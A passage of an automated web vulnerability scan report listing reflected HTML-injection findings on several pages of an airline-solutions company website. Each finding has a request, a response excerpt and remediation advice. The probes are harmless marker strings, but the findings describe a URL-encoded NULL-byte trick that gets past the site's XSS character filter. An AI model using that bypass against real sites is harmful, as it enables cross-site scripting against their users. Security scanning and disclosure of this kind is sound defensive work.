Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fbusiness_issues%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:38:08 GMT
Pragma: no-cache
Content-Length: 7122
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues?%00d1fb2"><a>4652b7d32bc=1">
...[SNIP]...

3.40. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/fuel_management

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %005ebe9<a>5d4d5d49d0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ebe9<a>5d4d5d49d0a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/fuel_management?%005ebe9<a>5d4d5d49d0a=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321561; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A1%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A4%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:24:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321561; expires=Thu, 06-Oct-2011 10:24:11 GMT; path=/
Set-Cookie: exp_last_activity=1286378651; expires=Thu, 06-Oct-2011 10:24:11 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fbusiness_issues%2Ffuel_management%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A2%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:24:29 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20404


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a>5d4d5d49d0a=1">fuel management?%005ebe9<a>5d4d5d49d0a=1</a>
...[SNIP]...

3.41. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/fuel_management

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0035c4b"><a>50f74342d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35c4b"><a>50f74342d82 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/fuel_management?%0035c4b"><a>50f74342d82=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321561; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A1%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A4%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:21:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321561; expires=Thu, 06-Oct-2011 10:21:27 GMT; path=/
Set-Cookie: exp_last_activity=1286378487; expires=Thu, 06-Oct-2011 10:21:27 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fbusiness_issues%2Ffuel_management%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A2%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:21:38 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20408


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues/fuel_management?%0035c4b"><a>50f74342d82=1">
...[SNIP]...

3.42. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/fuel_management/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00c8fc1<a>764063527b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c8fc1<a>764063527b4 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/fuel_management/?%00c8fc1<a>764063527b4=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322245; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:39:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322245; expires=Thu, 06-Oct-2011 10:39:16 GMT; path=/
Set-Cookie: exp_last_activity=1286379556; expires=Thu, 06-Oct-2011 10:39:16 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fbusiness_issues%2Ffuel_management%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:39:35 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a>764063527b4=1">?%00c8fc1<a>764063527b4=1</a>
...[SNIP]...

3.43. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/fuel_management/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008775d"><a>c02e51ee33d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8775d"><a>c02e51ee33d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/fuel_management/?%008775d"><a>c02e51ee33d=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322245; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:36:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322245; expires=Thu, 06-Oct-2011 10:36:03 GMT; path=/
Set-Cookie: exp_last_activity=1286379363; expires=Thu, 06-Oct-2011 10:36:03 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fbusiness_issues%2Ffuel_management%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:36:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20467


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues/fuel_management/?%008775d"><a>c02e51ee33d=1">
...[SNIP]...

3.44. http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/irregular_operations/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %004e1af<a>077d95e6518 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e1af<a>077d95e6518 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/irregular_operations/?%004e1af<a>077d95e6518=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322256; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:53:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322256; expires=Thu, 06-Oct-2011 10:53:09 GMT; path=/
Set-Cookie: exp_last_activity=1286380389; expires=Thu, 06-Oct-2011 10:53:09 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A3%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:53:13 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8232


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a>077d95e6518=1">?%004e1af<a>077d95e6518=1</a>
...[SNIP]...

3.45. http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/irregular_operations/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0059277"><a>214029d358f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59277"><a>214029d358f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/irregular_operations/?%0059277"><a>214029d358f=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322256; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:49:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322256; expires=Thu, 06-Oct-2011 10:49:56 GMT; path=/
Set-Cookie: exp_last_activity=1286380195; expires=Thu, 06-Oct-2011 10:49:56 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A3%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:50:12 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8236


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues/irregular_operations/?%0059277"><a>214029d358f=1">
...[SNIP]...

3.46. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/other_airline_issues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00bf7e1"><a>9d7b30f12ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf7e1"><a>9d7b30f12ab in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/other_airline_issues?%00bf7e1"><a>9d7b30f12ab=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321529; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fabout%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:37:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321529; expires=Thu, 06-Oct-2011 10:37:25 GMT; path=/
Set-Cookie: exp_last_activity=1286379444; expires=Thu, 06-Oct-2011 10:37:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A1%3Bs%3A15%3A%22%2Fabout%2Fsitemap%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:37:55 GMT
Pragma: no-cache
Content-Length: 6974
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues/other_airline_issues?%00bf7e1"><a>9d7b30f12ab=1">
...[SNIP]...

3.47. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/other_airline_issues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00f61d7<a>7f1e076aefd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f61d7<a>7f1e076aefd in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/other_airline_issues?%00f61d7<a>7f1e076aefd=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321529; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fabout%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:40:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321529; expires=Thu, 06-Oct-2011 10:40:38 GMT; path=/
Set-Cookie: exp_last_activity=1286379638; expires=Thu, 06-Oct-2011 10:40:38 GMT; path=/
